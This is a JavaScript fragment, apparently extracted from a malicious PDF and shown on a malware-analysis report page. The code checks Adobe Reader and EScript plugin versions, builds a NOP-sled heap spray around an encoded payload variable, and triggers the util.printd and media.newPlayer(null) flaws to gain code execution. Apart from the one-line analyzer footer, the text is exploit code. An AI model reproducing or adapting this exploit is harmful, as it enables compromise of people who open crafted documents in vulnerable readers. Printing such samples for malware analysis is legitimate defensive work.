if(((sv==6)\|\|(sv==7))&&(lv<7.11)){bx();}else if((lv>=9.1)\|\|(lv<=9.2)\|\|(lv>=8.13)\|\|(lv<=8.17)){function a(){util.printd('p@111111111111111111111111 : yyyy111',new Date());}var h=app.plugIns;for(var f=0;f<h.length;f++){if(h[f].name=='EScript'){var i=h[f].version;}} if((i>8.12)&&(i<8.2)){c=new Array();var d=unescape('%u9090%u9090');var e=unescape(bjsg);while(d.length<=0x8000){d+=d;}d=d.substr(0,0x8000-e.length);for(f=0;f<2900;f++){c[f]=d+e;}a();a();try{this.media.newPlayer(null);}catch(e){}a();}}

Open this report in the interactive analyzer, or submit your own file for analysis.